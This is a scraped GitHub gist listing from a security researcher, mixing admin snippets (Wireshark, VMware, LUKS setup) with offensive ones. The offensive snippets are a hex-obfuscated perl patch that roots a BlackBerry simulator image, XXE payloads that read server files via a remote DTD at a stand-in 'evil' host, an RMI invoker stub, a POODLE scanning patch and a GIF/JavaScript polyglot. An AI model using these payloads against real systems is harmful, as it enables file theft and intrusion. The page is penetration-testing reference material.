Skip to content

Instantly share code, notes, and snippets.

Etienne Stalmans staaldraad

Block or report user

Report or block staaldraad

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@staaldraad
staaldraad / setWireshark
Last active Aug 29, 2015
Run wireshark without having to be root
View setWireshark
#!/bin/bash
if [ "$1" != "" ]; then
USERNAME=$1
else
echo "ERROR: no username supplied"
echo "Using current user"
USERNAME=`whoami`
fi
@staaldraad
staaldraad / vmware_installfix
Created Feb 22, 2014
VWare Workstation 10 on Fedora 20 or kernel 3.13+ systems
View vmware_installfix
# Ensure all kernel headers are installed
yum install kernel-devel kernel-headers
# Make a copy of version.h to a location known to Vmware
cp /usr/src/kernels/`uname -r`/include/generated/uapi/linux/version.h /lib/modules/`uname -r`/build/include/linux/
#fix vmnet build
cd /usr/lib/vmware/modules/source/
curl http://pastie.org/pastes/8672356/download -o vmware-netfilter.patch
tar xf vmnet.tar
@staaldraad
staaldraad / gist:2f0d2ba4aa6afb0dd36f
Last active Aug 29, 2015
Update kernel paths for Ubuntu + vmware-player
View gist:2f0d2ba4aa6afb0dd36f
vmware-installer -u vmware-player
http://dandar3.blogspot.cz/2014/01/vmware-player-601-on-ubuntu-1404-alpha.html
@staaldraad
staaldraad / crypt_setup.sh
Last active Aug 29, 2015
Setup crypt container
View crypt_setup.sh
#create new file to use as container
#dd if=/dev/zero of=/out count=5000k
fallocate -l 1G test.img
#create luks wrapper
cryptsetup -v -y luksFormat /out
cryptsetup luksOpen /out cryptname
cryptsetup -v status cryptname
#make into filesystem
@staaldraad
staaldraad / PatchBB10Simulator.sh
Created Jun 18, 2014
Root Blackberry Simulator
View PatchBB10Simulator.sh
perl -i.backup -0777 -pe 's/\x69\x66\x20\x5b\x20\x22\x24\x7b\x42\x4f\x41\x52\x44\x5f\x43\x4f\x4e\x46\x49\x47\x7d\x22\x20\x21\x3d\x20\x22\x64\x65\x76\x65\x6c\x6f\x70\x65\x72\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x6d\x20\x2d\x72\x66\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x20\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x3b\x0a\x20\x20\x20\x20\x66\x69\x3b/\x63\x70\x20\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x20\x2f\x74\x6d\x70\x20\x26\x26\x20\x63\x68\x6d\x6f\x64\x20\x36\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x65\x74\x75\x69\x64\x67\x69\x64\x3b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/g' BlackBerry10Simulator-s001.vmdk
@staaldraad
staaldraad / xxe
Created Jul 7, 2014
XXE remote dtd
View xxe
Payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
@staaldraad
staaldraad / pyrmi.py
Last active Dec 1, 2018
Quick and dirty RMI invoker
View pyrmi.py
#!/usr/bin/python
"""
Python implementation of RMI invoker. Should try fetch a .jar from a server we control.
Author: Etienne Stalmans <etienne@sensepost.com>
Version: 08/10/2014 - v0.1
"""
import socket
import binascii
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@staaldraad
staaldraad / poodle-tls-go.patch
Created Dec 9, 2014
Patch Go libs for poodle-tls scan - Modified from https://gist.github.com/singe/f433c54f134a9390214e to work with Go 1.3.3 for Linux. -- These are mods to Adam Langley's (@agl__) work.
View poodle-tls-go.patch
diff -u -r b/src/pkg/crypto/tls/common.go a/src/pkg/crypto/tls/common.go
--- b/src/pkg/crypto/tls/common.go 2014-10-01 02:51:45.000000000 +0100
+++ a/src/pkg/crypto/tls/common.go 2014-12-09 13:55:55.167748499 +0000
@@ -301,6 +301,8 @@
// be used.
CurvePreferences []CurveID
+ BreakCBCPadding bool
+
serverInitOnce sync.Once // guards calling (*Config).serverInit
@staaldraad
staaldraad / gifjs
Created Jan 4, 2015
GIF that is also Javascript (via Ange Albertini at 31C3 - https://speakerdeck.com/ange/funky-file-formats-31c3)
View gifjs
0000000: 4749 4638 3961 2f2a 0a00 00ff 002c 0000 GIF89a/*.....,..
0000010: 0000 2f2a 0a00 0002 003b 2a2f 3d31 3b61 ../*.....;*/=1;a
0000020: 6c65 7274 2822 4865 6c6c 6f22 293b lert("Hello");
You can’t perform that action at this time.